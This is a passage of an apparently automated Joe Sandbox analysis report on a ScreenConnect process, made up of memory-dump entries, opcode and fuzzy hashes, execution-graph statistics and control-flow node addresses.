                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4deff0e0722cb7bae27cd8cf4ce8f39f0a040b95970d4af1241c0c092b9596c5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36F0F974D0021E8FDBA5DFACC845A6E7BF0AB04320F204759D529D7291F73486518B91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 07bd905c7d25bc2712a4578cd2ecca4488a23e1271a1bc9c3b25b1a682b78921
                                                                                                                                                                                                  • Instruction ID: 92cbb2bcbd3113c00b741a5e51015d6f7f0161b3641ebee31fb56ff4b99422f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07bd905c7d25bc2712a4578cd2ecca4488a23e1271a1bc9c3b25b1a682b78921
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55E0303670860D6B4B45CA4ED810D5BBBAADBC9360714C42AF849C7351DA31D90187A5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d175bbb6ab596bd7bafe9aacbb27bb04ba5c8215bac32d040147e7473ce130c4
                                                                                                                                                                                                  • Instruction ID: 16c1e79d56e36d987285b8986b66382b65fc5252fe49cdfa4e9c0b70b2d04369
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d175bbb6ab596bd7bafe9aacbb27bb04ba5c8215bac32d040147e7473ce130c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF027316483445FC3455778E8545AFB7A6FFC5350704857ED105DB281CF729C098BD1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a447e6aeb0e16a89a6046674c71e6b4304ee579e31f3fd595374b763d48073d7
                                                                                                                                                                                                  • Instruction ID: 2f82a88667454e9e131791e196d275ba6084f875ff68c8ea16b7d4c526798a20
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a447e6aeb0e16a89a6046674c71e6b4304ee579e31f3fd595374b763d48073d7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DE06D313012289BC719BF69E86872E7BAAEFC92617204165E426C73C8CB30981AC7D5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f663a762bc5afa519c65aa64dd5b4b15fc54b5494f3d31daff6bcdf26f01e2a5
                                                                                                                                                                                                  • Instruction ID: 6378355edb3ffa6fd168034e2220046fc9b44459c019b1ad10a68366ab3b2b8d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f663a762bc5afa519c65aa64dd5b4b15fc54b5494f3d31daff6bcdf26f01e2a5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94F0D471E00219DF8B80DFADC84169EFBF4EF89200B20C06AD918E7210E731AA12CFC0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a8698970a814781b149a9479fd13dfe15b235786df37338ff1db663110ef9dbb
                                                                                                                                                                                                  • Instruction ID: 68fac535caaa356dae9c59a0471d0b8d6e9beb12339e62bb680ea87d5cdf3c64
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8698970a814781b149a9479fd13dfe15b235786df37338ff1db663110ef9dbb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34E0DF323003186B87182A9A74D852FBADBEBC8A71754443EE20AC3344DE718C0A4790
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: af8d931f7c228f92b5923e97e18105f15f23d94d2795a28c52ef1a7021e20622
                                                                                                                                                                                                  • Instruction ID: d62fb7d23609f155bdcdb53d73c6a5fa8fa5a1bb94f2fc512a16cff4fd35c5eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: af8d931f7c228f92b5923e97e18105f15f23d94d2795a28c52ef1a7021e20622
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01F0392028EA844FD747A7A188A1A947FA0DB13354B8E40DDC048CF1D7DA4E9403C742
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9be3da8ec62a8c7ac1bde4b0fd1f23764e607485703e76c08d908461bcefbee4
                                                                                                                                                                                                  • Instruction ID: 5c52a74aa6f8425c1d31c112ee4b852f1db6904699586298ffc54b781198df8d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9be3da8ec62a8c7ac1bde4b0fd1f23764e607485703e76c08d908461bcefbee4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58E068729443186BCB09ABDDD8407DEBFF9EF8A320F044069E90CD7280DB3059024694
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 12bcdb7f812cf644a4421f73bbe29f2d650e1555406e49d811e7a51a119e278b
                                                                                                                                                                                                  • Instruction ID: 756fd62db167f5496f973404b481b90afc2abd9b447b6fd0f856ede9bdec77a2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12bcdb7f812cf644a4421f73bbe29f2d650e1555406e49d811e7a51a119e278b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86E0D8313002045783056778E84869FB79AFFC9260344C53ED50ACB344DF729C0547D1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ec43512c6bec5d49abec24930226aaf12f119017ebc9f8ebd92d6b41b121b407
                                                                                                                                                                                                  • Instruction ID: 397aa997c7adfb8cc49c362247fb69113395c19f9b9a46fb22457a170c274ae9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec43512c6bec5d49abec24930226aaf12f119017ebc9f8ebd92d6b41b121b407
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BE02632B052058BC344A61AE850967F3AAEBC8724F540438D20CD7355CD729C028790
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ceb2814ab98c24c716e283eb6efd1190efbe13f34f28a07d533bb8c69106f769
                                                                                                                                                                                                  • Instruction ID: 9bceb2db64a46332447950bd741d851c574bb3cec4e0850c5ba999b96f114093
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ceb2814ab98c24c716e283eb6efd1190efbe13f34f28a07d533bb8c69106f769
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AE0E6353011185787087B7DE46857F7B9AEFD95613244125E52AC7388DF709C0AC7D5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a3bced0c98b66d817c0d331c845bdc5e1c590b346bdaaa5a7deddf54cd7c713b
                                                                                                                                                                                                  • Instruction ID: 7c89eab15fb270b7d14471a5f8e1bd2e91c2ae898acdc16bb2b49f0769638244
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3bced0c98b66d817c0d331c845bdc5e1c590b346bdaaa5a7deddf54cd7c713b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13E0D8312097954FC716EB6CF84069E7BF36F86210B088EAAD1418B152C7B0B90987D5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ae081b42dcc4a627fe243fe76161aa126a15373ca4303c0e05a9b52601159263
                                                                                                                                                                                                  • Instruction ID: 5e8e51a7bb7be1799c33d97b22c9c0bc65e30ad77e788be9cd9434c7dea01551
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae081b42dcc4a627fe243fe76161aa126a15373ca4303c0e05a9b52601159263
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54E04630A0064CEFCB48EFA4ED41B5EBBF5EB46644F918598E808A7204DB316E10AB81
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 526bd104caf0ae94b8c9d8bcccddc5806f95c33b88120cf6f50194f29f5c687b
                                                                                                                                                                                                  • Instruction ID: ef5b9e8866b98a1c64f38ca32ca90328f4c815e635938d2e135b7315c6bddd44
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 526bd104caf0ae94b8c9d8bcccddc5806f95c33b88120cf6f50194f29f5c687b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60E04F7050D3849FC342DF38AD58149BFF0AE06604B0684AAD8C9C7251E230A906C762
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: dbc08b4d2f520031a9696bf40da631ef35d66dc55de74475897e2f805334737b
                                                                                                                                                                                                  • Instruction ID: 08486f62572f126d15efe31dffac2f97430910892c990ad5e1f4bbc48a3ebcdc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbc08b4d2f520031a9696bf40da631ef35d66dc55de74475897e2f805334737b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76E0C2B0348608CFC792CFACDC91A913BB5AF0970235B40D6C544CB3B2D621D810CFA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b879b4a066f13739a7fea18eb93673143ab1b76ba1406817252dff882add1c95
                                                                                                                                                                                                  • Instruction ID: 1365ce254285e2566630a6689fb86cff20113785c03077a9def9a6cbf2e92671
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b879b4a066f13739a7fea18eb93673143ab1b76ba1406817252dff882add1c95
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12D05B7070060CCF9755CB59D88171133F4BB486023A24095D505C7271CA30DC01CA61
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 80731cfc038d6f8976c2e8b2289172796ffea5e68cd431984eaa5062d6fd31aa
                                                                                                                                                                                                  • Instruction ID: ee18fd5d277fdb217ae54bbca003899169c573ac1af8f2047e18a5cb36efd03d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80731cfc038d6f8976c2e8b2289172796ffea5e68cd431984eaa5062d6fd31aa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCD05B7090114CEFCB44EFB4ED1455EB7B5EB45144B504599DD09D3300DE315F109B41
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 553aa76b7d81c59879319288dd4bdc325c6878530e467358a3f3616f3473e484
                                                                                                                                                                                                  • Instruction ID: 216ee98c665b8f58e9c327a8c55b9e37683470064e7ab3216d15b8cee19d98c2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 553aa76b7d81c59879319288dd4bdc325c6878530e467358a3f3616f3473e484
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0ED0C73141470D89C701BBB8D454469F778EED5250F00C65AE48957111FF70D5D0D681
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4b6cc8f81faa03d6c646e7d35bfbffe9020212c92ccf4b1613ac24f8ebf88644
                                                                                                                                                                                                  • Instruction ID: a15c4fbd2720ecee5a594a8222d0161231532effb46ebef1736fcc86e1a7a7bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b6cc8f81faa03d6c646e7d35bfbffe9020212c92ccf4b1613ac24f8ebf88644
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AC012342405048FC344DB58D554C2473F6AF8DA143158094D60D4B371CA21FC008A50

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:11.3%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:5
                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                  execution_graph 14412 7ff887cd8014 14414 7ff887cd801d 14412->14414 14413 7ff887cd8082 14414->14413 14415 7ff887cd80f6 SetProcessMitigationPolicy 14414->14415 14416 7ff887cd8152 14415->14416
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B$6B$6B
                                                                                                                                                                                                  • API String ID: 0-1796150382
                                                                                                                                                                                                  • Opcode ID: 66cdfe89d82a45066805691318c3cfc89a66b25f055177027f3927839a08c8cb
                                                                                                                                                                                                  • Instruction ID: dad228bd0b6616cb788a048d6e4d05a03d2bc2bebbcfcb5f1580f7ab554486a8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66cdfe89d82a45066805691318c3cfc89a66b25f055177027f3927839a08c8cb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11A20572E9CA4A4FE7A9EA2994556BD37E2FF95380F544079C44DCB2C3DE28B805C342

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 601 7ff887fe0395-7ff887fe0449 611 7ff887fe048b-7ff887fe048e 601->611 612 7ff887fe044b-7ff887fe0489 601->612 613 7ff887fe0490-7ff887fe049c 611->613 614 7ff887fe04d8-7ff887fe0500 611->614 612->611 616 7ff887fe049e 613->616 621 7ff887fe0524-7ff887fe053c 614->621 622 7ff887fe0502-7ff887fe0521 614->622 620 7ff887fe04a9-7ff887fe04c6 616->620 629 7ff887fe0560-7ff887fe057e 621->629 630 7ff887fe053e-7ff887fe055d 621->630 622->621 634 7ff887fe0580-7ff887fe0590 629->634 635 7ff887fe059a 629->635 630->629 638 7ff887fe0597-7ff887fe0598 634->638 637 7ff887fe059f-7ff887fe05a5 635->637 639 7ff887fe063e-7ff887fe0641 637->639 640 7ff887fe05ab-7ff887fe05b4 637->640 638->635 643 7ff887fe0643-7ff887fe064d 639->643 644 7ff887fe0698-7ff887fe069f 639->644 641 7ff887fe05b6-7ff887fe05c3 640->641 642 7ff887fe05cd-7ff887fe05d8 640->642 641->642 652 7ff887fe05c5-7ff887fe05cb 641->652 645 7ff887fe0624-7ff887fe0630 642->645 646 7ff887fe05da-7ff887fe05f7 642->646 648 7ff887fe0655-7ff887fe066e 643->648 655 7ff887fe06e6-7ff887fe06ea 644->655 656 7ff887fe06a1-7ff887fe06b6 644->656 645->639 653 7ff887fe08e2-7ff887fe093f 646->653 654 7ff887fe05fd-7ff887fe0622 646->654 660 7ff887fe0670-7ff887fe0672 648->660 661 7ff887fe06df-7ff887fe06e1 648->661 652->642 690 7ff887fe0941-7ff887fe094a 653->690 691 7ff887fe094b-7ff887fe0952 653->691 654->645 659 7ff887fe06eb-7ff887fe06ec 655->659 666 7ff887fe0800-7ff887fe081e 656->666 667 7ff887fe06ba-7ff887fe06c6 656->667 669 7ff887fe06ee-7ff887fe06fa 659->669 668 7ff887fe0674 660->668 660->669 661->655 696 7ff887fe0824-7ff887fe082e 666->696 697 7ff887fe08bd-7ff887fe08df 666->697 672 7ff887fe06cc-7ff887fe06da call 7ff887fe0078 667->672 673 7ff887fe06c8-7ff887fe06ca 667->673 668->667 674 7ff887fe0676-7ff887fe067a 668->674 675 7ff887fe0700-7ff887fe0701 669->675 676 7ff887fe06fc-7ff887fe06fe 669->676 678 7ff887fe06dd-7ff887fe06de 672->678 673->678 674->659 680 7ff887fe067c-7ff887fe0681 674->680 683 7ff887fe0702-7ff887fe070e call 7ff887fe0078 675->683 682 7ff887fe0711-7ff887fe0715 676->682 678->661 680->683 687 7ff887fe0683-7ff887fe068e 680->687 685 7ff887fe0716-7ff887fe072e 682->685 683->682 701 7ff887fe0734-7ff887fe0742 call 7ff887fe0078 685->701 702 7ff887fe0730-7ff887fe0732 685->702 693 7ff887fe0690-7ff887fe0695 687->693 694 7ff887fe06ff 687->694 698 7ff887fe0954-7ff887fe095d 691->698 699 7ff887fe095e-7ff887fe0969 691->699 693->685 700 7ff887fe0697 693->700 694->675 703 7ff887fe0834-7ff887fe0842 call 7ff887fe0078 696->703 704 7ff887fe0830-7ff887fe0832 696->704 697->653 700->644 707 7ff887fe0745-7ff887fe0762 701->707 702->707 709 7ff887fe0845-7ff887fe0862 703->709 704->709 715 7ff887fe0764-7ff887fe0766 707->715 716 7ff887fe0768-7ff887fe0776 call 7ff887fe0078 707->716 717 7ff887fe0864-7ff887fe0866 709->717 718 7ff887fe0868-7ff887fe0876 call 7ff887fe0078 709->718 719 7ff887fe0779-7ff887fe078f 715->719 716->719 721 7ff887fe0879-7ff887fe0896 717->721 718->721 727 7ff887fe07a6-7ff887fe07ad 719->727 728 7ff887fe0791-7ff887fe07a4 call 7ff887fe0078 719->728 729 7ff887fe089c-7ff887fe08aa call 7ff887fe0078 721->729 730 7ff887fe0898-7ff887fe089a 721->730 736 7ff887fe07b4-7ff887fe07c7 727->736 728->727 737 7ff887fe07cd-7ff887fe07d0 728->737 732 7ff887fe08ad-7ff887fe08b6 729->732 730->732 732->697 736->737 738 7ff887fe07e7-7ff887fe07fa 737->738 739 7ff887fe07d2-7ff887fe07e5 call 7ff887fe0078 737->739 738->666 739->666 739->738
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: a94aab1fd61e24fad41038914601c7d82617ff87c728051f1db5ada70f523eed
                                                                                                                                                                                                  • Instruction ID: 17ee016f383b956824703ce718bcd9ae5059a9d00ebb1714bdc0fac248c10977
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a94aab1fd61e24fad41038914601c7d82617ff87c728051f1db5ada70f523eed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91124672A8CA4A4FE799E62D94516BD37E1FF95390F2800BAD05DCF2D3DD28A846C340
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: d20ec13e26212acdc01c7ff2b5f1bffb7b6118e484f56ef8c8d4b39c8c39e3e3
                                                                                                                                                                                                  • Instruction ID: eaf769a0be85a89bdd92afb27959e81aa21b9abf790a1a61911a2274a56c8c03
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d20ec13e26212acdc01c7ff2b5f1bffb7b6118e484f56ef8c8d4b39c8c39e3e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4120432E98A4B4BEBA9DA2984516BD37E2FF95784F544079C41DCB2C7DE2CB805C342
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9ade17e62efc2121bc516542c979139dcc3d27a6feed6dd7c229185748e2d473
                                                                                                                                                                                                  • Instruction ID: 9b728685ba454c55178008ea667fb1878670c150ebfef6255b9b8c7e1763b086
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ade17e62efc2121bc516542c979139dcc3d27a6feed6dd7c229185748e2d473
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0E1E632E98A4B4BE7A9E72984516BD77F2FF96380F540479D04DCB2C2DE28B846C341

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2606398556.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887cd0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                  • Opcode ID: b5e7bae6fb7aa9685fb5391d45bd16ba1088eed49284e24226f5a18aab6cbb6c
                                                                                                                                                                                                  • Instruction ID: 5d3583626a26b599f70ed5b32494303393814f1cadafc39ba9ec75ae689f0322
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5e7bae6fb7aa9685fb5391d45bd16ba1088eed49284e24226f5a18aab6cbb6c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF412631D0CB498FDB25ABA8D84A5F97BF1EF55350F04017EE449C3192DF68A846C791
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
